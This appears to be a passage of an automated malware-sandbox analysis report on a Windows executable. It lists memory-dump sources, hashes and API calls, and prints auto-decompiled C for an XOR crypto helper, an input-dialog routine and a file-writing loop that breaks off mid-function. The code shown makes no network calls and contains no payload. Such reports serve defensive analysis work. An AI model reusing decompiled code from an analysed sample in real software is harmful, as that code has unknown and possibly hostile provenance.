                                                                                                                                                                      0x0041074d
                                                                                                                                                                      0x00410744
                                                                                                                                                                      0x00410751
                                                                                                                                                                      0x00410755
                                                                                                                                                                      0x00410758
                                                                                                                                                                      0x00410768
                                                                                                                                                                      0x0041076a
                                                                                                                                                                      0x0041076c
                                                                                                                                                                      0x00410772
                                                                                                                                                                      0x00410774
                                                                                                                                                                      0x00410777
                                                                                                                                                                      0x00410779
                                                                                                                                                                      0x00410779
                                                                                                                                                                      0x0041077b
                                                                                                                                                                      0x0041077e
                                                                                                                                                                      0x0041077e
                                                                                                                                                                      0x00410774
                                                                                                                                                                      0x00410782
                                                                                                                                                                      0x00410782
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00410768
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00410784
                                                                                                                                                                      0x00410784
                                                                                                                                                                      0x00410788
                                                                                                                                                                      0x0041078c
                                                                                                                                                                      0x004107a7

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 6219c0534570dcc087454eb9247404a7b3db1bae580b6f203b5ef7fccfb18fab
                                                                                                                                                                      • Instruction ID: 9888a4de930789566df02ddbbb4f2336257ff221a319327ec1b953e4cac8e425
                                                                                                                                                                      • Opcode Fuzzy Hash: 6219c0534570dcc087454eb9247404a7b3db1bae580b6f203b5ef7fccfb18fab
                                                                                                                                                                      • Instruction Fuzzy Hash: 2631A6326447054BE728DD28C8947EB7390AB84304F49093FC996973D1C6F9E9D6CA85
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004106B9, Relevance: .1, Instructions: 82COMMONCrypto
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E004106B9(signed int __ebx, signed int __edi, signed int __ebp, char _a16, char _a144, signed int _a280) {
				unsigned int _t30;
				unsigned int _t37;
				signed int* _t41;
				signed int* _t42;
				signed int _t43;
				signed int* _t46;
				signed int* _t47;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				signed int _t53;
				signed int _t54;
				signed int _t55;
				void* _t57;
				void* _t59;
				signed int _t60;
				signed int _t61;
				void* _t63;

				_t60 = __ebp;
				_t54 = __edi;
				_t43 = __ebx;
				do {
					_t57 = 0;
					do {
						_t30 =  *(_t63 + _t57 + 0x10);
						_t46 =  &_a16;
						_t52 = 0;
						if(_t30 != 0) {
							do {
								if((_t30 & 0x00000001) != 0) {
									_t52 = _t52 ^  *_t46;
								}
								_t46 =  &(_t46[1]);
								_t30 = _t30 >> 1;
							} while (_t30 != 0);
						}
						 *(_t63 + _t57 + 0x90) = _t52;
						_t57 = _t57 + 4;
					} while (_t57 < 0x80);
					if((_t60 & 0x00000001) != 0) {
						_t51 = 0;
						_t42 =  &_a144;
						if(_t43 != 0) {
							do {
								if((_t43 & 0x00000001) != 0) {
									_t51 = _t51 ^  *_t42;
								}
								_t42 =  &(_t42[1]);
								_t43 = _t43 >> 1;
							} while (_t43 != 0);
						}
						_t43 = _t51;
					}
					_t61 = (_t54 << 0x00000020 | _t60) >> 1;
					_t55 = _t54 >> 1;
					if((_t61 | _t55) != 0) {
						_t59 = 0;
						do {
							_t37 =  *(_t63 + _t59 + 0x90);
							_t47 =  &_a144;
							_t53 = 0;
							if(_t37 != 0) {
								do {
									if((_t37 & 0x00000001) != 0) {
										_t53 = _t53 ^  *_t47;
									}
									_t47 =  &(_t47[1]);
									_t37 = _t37 >> 1;
								} while (_t37 != 0);
							}
							 *(_t63 + _t59 + 0x10) = _t53;
							_t59 = _t59 + 4;
						} while (_t59 < 0x80);
						if((_t61 & 0x00000001) != 0) {
							_t50 = 0;
							_t41 =  &_a16;
							if(_t43 != 0) {
								do {
									if((_t43 & 0x00000001) != 0) {
										_t50 = _t50 ^  *_t41;
									}
									_t41 =  &(_t41[1]);
									_t43 = _t43 >> 1;
								} while (_t43 != 0);
							}
							_t43 = _t50;
						}
						goto L26;
					}
					break;
					L26:
					_t60 = (_t55 << 0x00000020 | _t61) >> 1;
					_t54 = _t55 >> 1;
				} while ((_t60 | _t54) != 0);
				return _t43 ^ _a280;
			}





















                                                                                                                                                                      0x004106b9
                                                                                                                                                                      0x004106b9
                                                                                                                                                                      0x004106b9
                                                                                                                                                                      0x004106c0
                                                                                                                                                                      0x004106c0
                                                                                                                                                                      0x004106c2
                                                                                                                                                                      0x004106c2
                                                                                                                                                                      0x004106c6
                                                                                                                                                                      0x004106ca
                                                                                                                                                                      0x004106ce
                                                                                                                                                                      0x004106d0
                                                                                                                                                                      0x004106d2
                                                                                                                                                                      0x004106d4
                                                                                                                                                                      0x004106d4
                                                                                                                                                                      0x004106d6
                                                                                                                                                                      0x004106d9
                                                                                                                                                                      0x004106d9
                                                                                                                                                                      0x004106d0
                                                                                                                                                                      0x004106dd
                                                                                                                                                                      0x004106e4
                                                                                                                                                                      0x004106e7
                                                                                                                                                                      0x004106f7
                                                                                                                                                                      0x004106f9
                                                                                                                                                                      0x004106fb
                                                                                                                                                                      0x00410704
                                                                                                                                                                      0x00410706
                                                                                                                                                                      0x00410709
                                                                                                                                                                      0x0041070b
                                                                                                                                                                      0x0041070b
                                                                                                                                                                      0x0041070d
                                                                                                                                                                      0x00410710
                                                                                                                                                                      0x00410710
                                                                                                                                                                      0x00410706
                                                                                                                                                                      0x00410714
                                                                                                                                                                      0x00410714
                                                                                                                                                                      0x00410716
                                                                                                                                                                      0x0041071a
                                                                                                                                                                      0x00410720
                                                                                                                                                                      0x00410722
                                                                                                                                                                      0x00410730
                                                                                                                                                                      0x00410730
                                                                                                                                                                      0x00410737
                                                                                                                                                                      0x0041073e
                                                                                                                                                                      0x00410742
                                                                                                                                                                      0x00410744
                                                                                                                                                                      0x00410746
                                                                                                                                                                      0x00410748
                                                                                                                                                                      0x00410748
                                                                                                                                                                      0x0041074a
                                                                                                                                                                      0x0041074d
                                                                                                                                                                      0x0041074d
                                                                                                                                                                      0x00410744
                                                                                                                                                                      0x00410751
                                                                                                                                                                      0x00410755
                                                                                                                                                                      0x00410758
                                                                                                                                                                      0x00410768
                                                                                                                                                                      0x0041076a
                                                                                                                                                                      0x0041076c
                                                                                                                                                                      0x00410772
                                                                                                                                                                      0x00410774
                                                                                                                                                                      0x00410777
                                                                                                                                                                      0x00410779
                                                                                                                                                                      0x00410779
                                                                                                                                                                      0x0041077b
                                                                                                                                                                      0x0041077e
                                                                                                                                                                      0x0041077e
                                                                                                                                                                      0x00410774
                                                                                                                                                                      0x00410782
                                                                                                                                                                      0x00410782
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00410768
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00410784
                                                                                                                                                                      0x00410784
                                                                                                                                                                      0x00410788
                                                                                                                                                                      0x0041078c
                                                                                                                                                                      0x004107a7

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 8f177ef76dc2d83bc780de5ca5247833b6fb957e59de742fcb7e95280a36d76d
                                                                                                                                                                      • Instruction ID: 913bc378ac3619563ee01a4a6d213c0ab1a3543cf495c4be7d0f57f0f97c2174
                                                                                                                                                                      • Opcode Fuzzy Hash: 8f177ef76dc2d83bc780de5ca5247833b6fb957e59de742fcb7e95280a36d76d
                                                                                                                                                                      • Instruction Fuzzy Hash: 2C219532644B054BE7289D68D8953EB7390AB84304F49093FC9A6973D1CAF9F9D6CA84
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00408F09, Relevance: 65.0, APIs: 32, Strings: 5, Instructions: 270windowregistrymemoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 89%
                                                                                                                                                                      			E00408F09(void* __ecx, void* __edx, void* __eflags, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, signed char _a16, intOrPtr _a20) {
				struct _WNDCLASSEXW _v48;
				struct tagMSG _v76;
				short _v78;
				short _v80;
				char _v82;
				struct tagACCEL _v88;
				WCHAR* _v92;
				void* _v96;
				wchar_t* _v104;
				struct HINSTANCE__* _t48;
				WCHAR* _t51;
				struct HWND__* _t56;
				struct HWND__* _t57;
				int _t58;
				int _t62;
				struct HWND__* _t74;
				struct HWND__* _t76;
				struct HWND__* _t80;
				short _t82;
				short _t84;
				int _t105;
				WCHAR* _t110;
				struct HWND__* _t111;
				void* _t112;
				void* _t116;
				wchar_t* _t117;
				struct HACCEL__* _t122;
				int _t130;

				_t116 = __edx;
				_t112 = __ecx;
				_v96 = 0;
				_t110 = E00408DF8(_a4);
				_v92 = _t110;
				_a4 = E00408DF8(_a8);
				_t117 = E00408DF8(_a12);
				_t130 =  *0x4170c4; // 0x0
				if(_t130 == 0) {
					 *0x4170c4 = GetStockObject(0x11);
				}
				_t48 =  *0x41700c; // 0x400000
				_v48.cbSize = 0x30;
				_v48.style = 3;
				_v48.lpfnWndProc = E00408E54;
				_v48.cbClsExtra = 0;
				_v48.cbWndExtra = 0;
				_v48.hInstance = _t48;
				_v48.hIcon = LoadIconW(_t48, 1);
				_v48.hCursor = LoadCursorW(0, 0x7f00);
				_t51 =  *0x416114; // 0x412044
				_v48.lpszClassName = _t51;
				_v48.hbrBackground = 0x10;
				_v48.lpszMenuName = 0;
				_v48.hIconSm = 0;
				RegisterClassExW( &_v48);
				 *0x4170c8 = 0;
				 *0x4170d8 = E00409471(_t112);
				E00409528(1);
				_t56 =  *0x4170d8; // 0x0
				if(_t56 == 0 || IsWindowEnabled(_t56) == 0) {
					 *0x4170dc = 0;
				} else {
					EnableWindow( *0x4170d8, 0);
					 *0x4170dc = 1;
				}
				_t57 = E00409471(_t112);
				_t58 = GetSystemMetrics(1);
				asm("cdq");
				_t62 = GetSystemMetrics(0);
				asm("cdq");
				_t111 = CreateWindowExW(0,  *0x416114, _t110, 0x10c80000, (_t62 - _t116 >> 1) - 0x96, (_t58 - _t116 >> 1) - 0x41, 0x12c, 0x82, _t57, 0,  *0x41700c, 0);
				if(_t111 == 0) {
					L20:
					if(_v96 != 0) {
						goto L22;
					}
					goto L21;
				} else {
					SetWindowLongW(_t111, 0xffffffeb,  &_v96);
					_t74 = CreateWindowExW(0, L"STATIC", _a4, 0x5000000b, 0xa, 0xa, 0x118, 0x16, _t111, 0,  *0x41700c, 0);
					 *0x4170d4 = _t74;
					SendMessageW(_t74, 0x30,  *0x4170c4, 1);
					if((_a16 & 0x00000001) != 0) {
						_push(0x20);
						_pop(0);
					}
					_t76 = CreateWindowExW(0x200, L"EDIT", 0, 0x50010080, 0xa, 0x20, 0x113, 0x15, _t111, 0xa,  *0x41700c, 0);
					 *0x4170d0 = _t76;
					SendMessageW(_t76, 0x30,  *0x4170c4, 1);
					SetFocus( *0x4170d0);
					if(_t117 != 0) {
						SendMessageW( *0x4170d0, 0xc, 0, _t117);
						_push(wcslen(_t117));
						_t105 = wcslen(_t117);
						_pop(_t112);
						SendMessageW( *0x4170d0, 0xb1, _t105, ??);
					}
					_t80 = CreateWindowExW(0, L"BUTTON", L"OK", 0x50010001, 0x6e, 0x43, 0x50, 0x19, _t111, 0x3e8,  *0x41700c, 0);
					 *0x4170cc = _t80;
					SendMessageW(_t80, 0x30,  *0x4170c4, 1);
					_t82 = 0xd;
					_v88.key = _t82;
					_v88.cmd = 0x3e8;
					_t84 = 0x1b;
					_v80 = _t84;
					_v78 = 0x3e9;
					_v88.fVirt = 1;
					_v82 = 1;
					_t122 = CreateAcceleratorTableW( &_v88, 2);
					SetForegroundWindow(_t111);
					BringWindowToTop(_t111);
					while( *0x4170c8 == 0) {
						if(GetMessageW( &_v76, 0, 0, 0) == 0) {
							break;
						}
						if(TranslateAcceleratorW(_t111, _t122,  &_v76) == 0) {
							TranslateMessage( &_v76);
							DispatchMessageW( &_v76);
						}
					}
					if(_t122 != 0) {
						DestroyAcceleratorTable(_t122);
					}
					if(_v96 == 0) {
						L21:
						E0040E2A0(_t112, _a20);
						L22:
						E00408E3A(_v92);
						E00408E3A(_a4);
						return E00408E3A(_t117);
					} else {
						wcscpy(E0040E200(wcslen(_v96), _a20), _v104);
						_pop(_t112);
						HeapFree( *0x417008, 0, _v104);
						goto L20;
					}
				}
			}































                                                                                                                                                                      0x00408f09
                                                                                                                                                                      0x00408f09
                                                                                                                                                                      0x00408f16
                                                                                                                                                                      0x00408f25
                                                                                                                                                                      0x00408f27
                                                                                                                                                                      0x00408f37
                                                                                                                                                                      0x00408f46
                                                                                                                                                                      0x00408f48
                                                                                                                                                                      0x00408f4e
                                                                                                                                                                      0x00408f58
                                                                                                                                                                      0x00408f58
                                                                                                                                                                      0x00408f5d
                                                                                                                                                                      0x00408f65
                                                                                                                                                                      0x00408f6d
                                                                                                                                                                      0x00408f75
                                                                                                                                                                      0x00408f7d
                                                                                                                                                                      0x00408f81
                                                                                                                                                                      0x00408f85
                                                                                                                                                                      0x00408f95
                                                                                                                                                                      0x00408f9f
                                                                                                                                                                      0x00408fa3
                                                                                                                                                                      0x00408fa8
                                                                                                                                                                      0x00408fb1
                                                                                                                                                                      0x00408fb9
                                                                                                                                                                      0x00408fbd
                                                                                                                                                                      0x00408fc1
                                                                                                                                                                      0x00408fc7
                                                                                                                                                                      0x00408fd4
                                                                                                                                                                      0x00408fd9
                                                                                                                                                                      0x00408fde
                                                                                                                                                                      0x00408fe5
                                                                                                                                                                      0x0040900b
                                                                                                                                                                      0x00408ff2
                                                                                                                                                                      0x00408ff9
                                                                                                                                                                      0x00408fff
                                                                                                                                                                      0x00408fff
                                                                                                                                                                      0x00409019
                                                                                                                                                                      0x00409031
                                                                                                                                                                      0x00409033
                                                                                                                                                                      0x0040903e
                                                                                                                                                                      0x00409046
                                                                                                                                                                      0x00409061
                                                                                                                                                                      0x00409065
                                                                                                                                                                      0x0040925a
                                                                                                                                                                      0x0040925f
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040906b
                                                                                                                                                                      0x00409073
                                                                                                                                                                      0x004090a1
                                                                                                                                                                      0x004090b1
                                                                                                                                                                      0x004090b9
                                                                                                                                                                      0x004090c3
                                                                                                                                                                      0x004090c5
                                                                                                                                                                      0x004090c7
                                                                                                                                                                      0x004090c7
                                                                                                                                                                      0x004090f7
                                                                                                                                                                      0x00409101
                                                                                                                                                                      0x00409109
                                                                                                                                                                      0x00409111
                                                                                                                                                                      0x00409119
                                                                                                                                                                      0x00409126
                                                                                                                                                                      0x0040912f
                                                                                                                                                                      0x00409131
                                                                                                                                                                      0x00409136
                                                                                                                                                                      0x00409143
                                                                                                                                                                      0x00409143
                                                                                                                                                                      0x0040916d
                                                                                                                                                                      0x00409177
                                                                                                                                                                      0x0040917f
                                                                                                                                                                      0x00409183
                                                                                                                                                                      0x00409184
                                                                                                                                                                      0x00409190
                                                                                                                                                                      0x00409195
                                                                                                                                                                      0x00409196
                                                                                                                                                                      0x004091a0
                                                                                                                                                                      0x004091ac
                                                                                                                                                                      0x004091b1
                                                                                                                                                                      0x004091bd
                                                                                                                                                                      0x004091bf
                                                                                                                                                                      0x004091c6
                                                                                                                                                                      0x0040920a
                                                                                                                                                                      0x004091e1
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004091f2
                                                                                                                                                                      0x004091f9
                                                                                                                                                                      0x00409204
                                                                                                                                                                      0x00409204
                                                                                                                                                                      0x004091f2
                                                                                                                                                                      0x00409215
                                                                                                                                                                      0x00409218
                                                                                                                                                                      0x00409218
                                                                                                                                                                      0x00409223
                                                                                                                                                                      0x00409261
                                                                                                                                                                      0x00409268
                                                                                                                                                                      0x0040926d
                                                                                                                                                                      0x00409271
                                                                                                                                                                      0x0040927a
                                                                                                                                                                      0x0040928f
                                                                                                                                                                      0x00409225
                                                                                                                                                                      0x00409241
                                                                                                                                                                      0x00409247
                                                                                                                                                                      0x00409254
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00409254
                                                                                                                                                                      0x00409223

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00408DF8: wcslen.MSVCRT ref: 00408E04
                                                                                                                                                                        • Part of subcall function 00408DF8: HeapAlloc.KERNEL32(00000000,00000000,?,00408F21,?), ref: 00408E1A
                                                                                                                                                                        • Part of subcall function 00408DF8: wcscpy.MSVCRT ref: 00408E2B
                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 00408F52
                                                                                                                                                                      • LoadIconW.USER32 ref: 00408F89
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00408F99
                                                                                                                                                                      • RegisterClassExW.USER32 ref: 00408FC1
                                                                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00408FE8
                                                                                                                                                                      • EnableWindow.USER32(00000000), ref: 00408FF9
                                                                                                                                                                      • GetSystemMetrics.USER32 ref: 00409031
                                                                                                                                                                      • GetSystemMetrics.USER32 ref: 0040903E
                                                                                                                                                                      • CreateWindowExW.USER32 ref: 0040905F
                                                                                                                                                                      • SetWindowLongW.USER32 ref: 00409073
                                                                                                                                                                      • CreateWindowExW.USER32 ref: 004090A1
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000001), ref: 004090B9
                                                                                                                                                                      • CreateWindowExW.USER32 ref: 004090F7
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000001), ref: 00409109
                                                                                                                                                                      • SetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409111
                                                                                                                                                                      • SendMessageW.USER32(0000000C,00000000,00000000), ref: 00409126
                                                                                                                                                                      • wcslen.MSVCRT ref: 00409129
                                                                                                                                                                      • wcslen.MSVCRT ref: 00409131
                                                                                                                                                                      • SendMessageW.USER32(000000B1,00000000,00000000), ref: 00409143
                                                                                                                                                                      • CreateWindowExW.USER32 ref: 0040916D
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000001), ref: 0040917F
                                                                                                                                                                      • CreateAcceleratorTableW.USER32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004091B6
                                                                                                                                                                      • SetForegroundWindow.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004091BF
                                                                                                                                                                      • BringWindowToTop.USER32(00000000), ref: 004091C6
                                                                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004091D9
                                                                                                                                                                      • TranslateAcceleratorW.USER32(00000000,00000000,?), ref: 004091EA
                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 004091F9
                                                                                                                                                                      • DispatchMessageW.USER32 ref: 00409204
                                                                                                                                                                      • DestroyAcceleratorTable.USER32 ref: 00409218
                                                                                                                                                                      • wcslen.MSVCRT ref: 00409229
                                                                                                                                                                      • wcscpy.MSVCRT ref: 00409241
                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409254
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Message$CreateSend$wcslen$Accelerator$HeapLoadMetricsSystemTableTranslatewcscpy$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundFreeIconLongObjectRegisterStock
                                                                                                                                                                      • String ID: 0$BUTTON$D A$EDIT$STATIC
                                                                                                                                                                      • API String ID: 54849019-3594934238
                                                                                                                                                                      • Opcode ID: 52e87966c6cca03b54c2017619d01c3975366cb43439a8209a5400c07438eea5
                                                                                                                                                                      • Instruction ID: 4016936b5c3c7f784b3cc7a4ee05ecee8f5df5742f345e72c0c18d3b3e823eb4
                                                                                                                                                                      • Opcode Fuzzy Hash: 52e87966c6cca03b54c2017619d01c3975366cb43439a8209a5400c07438eea5
                                                                                                                                                                      • Instruction Fuzzy Hash: 1E917F70648300BFE7219F61DC4AF9B7FA9FB48B44F01893EF644A61E1C7B998408B59
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00401500, Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 335fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                                      			E00401500(void* __edi, void* __esi, char _a4, long _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v0;
				char _v4;
				char _v8;
				char* _v12;
				char _v16;
				char _v20;
				intOrPtr _v28;
				char _v36;
				signed int _v48;
				void* __ebx;
				void* _t65;
				void* _t66;
				void* _t82;
				void* _t88;
				void* _t94;
				void* _t99;
				void* _t100;
				void* _t108;
				void* _t111;
				void* _t120;
				long _t129;
				void* _t130;
				void* _t131;
				void* _t136;
				char* _t142;
				void* _t151;
				void* _t152;
				void* _t157;
				void* _t159;
				void* _t163;
				intOrPtr _t178;
				intOrPtr _t183;
				void* _t186;
				char* _t189;
				void* _t190;
				void* _t191;
				void* _t193;
				void* _t196;
				void* _t199;
				intOrPtr _t200;
				void* _t201;
				intOrPtr _t202;
				intOrPtr _t203;
				intOrPtr _t205;
				void* _t206;
				intOrPtr _t207;
				void* _t208;
				intOrPtr _t210;
				void* _t211;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t218;
				void* _t221;
				void* _t223;
				void* _t224;
				intOrPtr _t227;
				void* _t231;

				_t224 = __esi;
				_t223 = __edi;
				_t189 = 0xb;
				do {
					_t231 = _t231 - 4;
					_v12 = 0;
					_t189 = _t189 - 1;
				} while (_t189 != 0);
				E0040DF60();
				_t169 =  *0x41708c; // 0x1
				if(_t169 != 1) {
					 *0x41708c = 1;
					_a16 = 1;
					while(1) {
						_t65 = E0040DE20();
						_t190 = _t189;
						_push(_t65);
						_t66 = E0040DE20();
						_t191 = _t190;
						E004057F0(_t169, _t223, _t224,  *0x41701c, _a16, 0x41602a, _t66);
						_push( &_v12);
						E0040DE60();
						_v12 = E00405920(_v20, 0x41602e);
						__eflags = _v12;
						if(_v12 != 0) {
							_t130 = E0040DE20();
							_t213 = _t191;
							_push(_t130);
							_t131 = E0040DE20();
							_t214 = _t213;
							E004057F0(_t169, _t223, _t224, _a4, 2, 0x41602e, _t131);
							_push( &_a8);
							E0040DE60();
							_t136 = E0040DE20();
							_t215 = _t214;
							_push(_t136);
							E004057F0(_t169, _t223, _t224, _v20, 1, 0x41602e, E0040DE20());
							E0040DE60( &_v36, _t215);
						}
						__eflags = 0;
						E00405120(0, _a4);
						if(__eflags != 0) {
							break;
						}
						asm("cdq");
						_t189 = _a16 % 2;
						__eflags = _t189;
						if(__eflags != 0) {
							_t82 = E0040DE20();
							_t193 = _t189;
							_push(_t82);
							_push(_t193);
							_push(E0040DE20());
							E00405AC0(__eflags, _a4, 1);
							E0040E020(2);
							_pop(_t186);
							E00405120(E00405160(_t186), 0x416032);
							if(__eflags == 0) {
								_t88 = E0040DE20();
								_t196 = 0x416032;
								_push(_t88);
								E00405D40(_v0, 0x416032, E0040DE20());
								E0040DE60( &_v12, _t196);
								_push(_v20);
								_t94 = E0040DE20();
								_pop(_t199);
								E0040DFC0(_t199);
								_t52 =  &_a4; // 0x247403c
								E0040DE60(_t52, _t94);
								_push(E00405980(_v12));
								_t227 =  *0x417090; // 0x2474038
								__eflags = _t227 + _v48 * 0xc;
								_pop(_t99);
								_v0 = _t99;
								_t200 =  *0x417088; // 0x237a5d8
								_t100 = E0040DE20();
								_t201 = _t200;
								E0040DFC0(_t201);
								_t202 =  *0x417048; // 0x2379a48
								E0040DFC0(_t202);
								_t203 =  *0x417064; // 0x23705f0
								E0040DFC0(_t203);
								E0040DFC0(_v48);
								_t189 = L"\r\n";
								E0040DFC0(_t189);
								E0040DE60(0x417088, _t100);
							} else {
								_t205 =  *0x417048; // 0x2379a48
								_t108 = E0040DE20();
								_t206 = _t205;
								_push(_t108);
								E0040DFC0(_t206);
								_t207 =  *0x417064; // 0x23705f0
								E0040DFC0(_t207);
								_t111 = E0040DE20();
								_t208 = _t207;
								_push(_t111);
								E00405D40(_v8, 0x416032, E0040DE20());
								E0040DE60( &_a4, _t208);
								E0040A665(_v4);
								_t178 =  *0x41707c; // 0x0
								__eflags = _t178 - 1;
								if(_t178 == 1) {
									_push(E00405980(_a20));
									E0040A6E5(_a20);
								}
								_push(_a24);
								E00403C3E();
								_t210 =  *0x417088; // 0x237a5d8
								_t120 = E0040DE20();
								_t211 = _t210;
								E0040DFC0(_t211);
								E0040DFC0(_a16);
								_t189 = L"\r\n";
								E0040DFC0(_t189);
								E0040DE60(0x417088, _t120);
							}
						} else {
							_t129 = E00405980(_a4);
							_a8 = _t129;
							_v12 =  &(_v12[1]);
						}
						_t169 = _a12 + 1;
						_a12 = _a12 + 1;
					}
					_t74 = _v8;
				} else {
					_t183 =  *0x417074; // 0x0
					if(_t183 != 1) {
						L6:
						_t142 = 0;
						__eflags = 0;
					} else {
						_t183 =  *0x417060; // 0x0
						if(_t183 == 1) {
							goto L6;
						} else {
							_t142 = 1;
						}
					}
					_t74 = _t142;
					if(_t142 != 0) {
						_v20 = E00405760( *0x417088, 0x416022);
						_v16 = 1;
						while(_v12 >= _v8) {
							_t151 = E0040DE20();
							_t218 = _t189;
							_push(_t151);
							_t152 = E0040DE20();
							_t189 = _t218;
							_t3 =  &_v8; // 0x416062
							E004057F0(_t183, _t223, _t224,  *0x417088,  *_t3, L"\r\n", _t152);
							_push( &_v20);
							E0040DE60();
							_t157 = E0040249B(_v28);
							_t239 = _t157;
							if(_t157 != 0) {
								_push(_t189);
								_t159 = E0040DE20();
								E00402BFA(_t239, _v4);
								_t7 =  &_v4; // 0x416062
								E0040DE60(_t7, _t159);
								_t8 =  &_v8; // 0x416062
								_push( *_t8);
								_t163 = E0040DE20();
								_pop(_t221);
								E0040DFC0(_t221);
								_t9 =  &_v16; // 0x416062
								E0040DFC0( *_t9);
								_t189 = L"\r\n";
								E0040DFC0(_t189);
								E0040DE60( &_v20, _t163);
							}
							_t11 =  &_v8;
							 *_t11 = _v8 + 1;
							if( *_t11 >= 0) {
								continue;
							}
							break;
						}
						_a4 = E00405700(_a4);
						WriteFile( *0x417034, _v0, E00409B00(_a4),  &_a8, 0);
						E00409B20(_v0);
						_t74 = E00405068(0x417088, 0x416020);
					}
				}
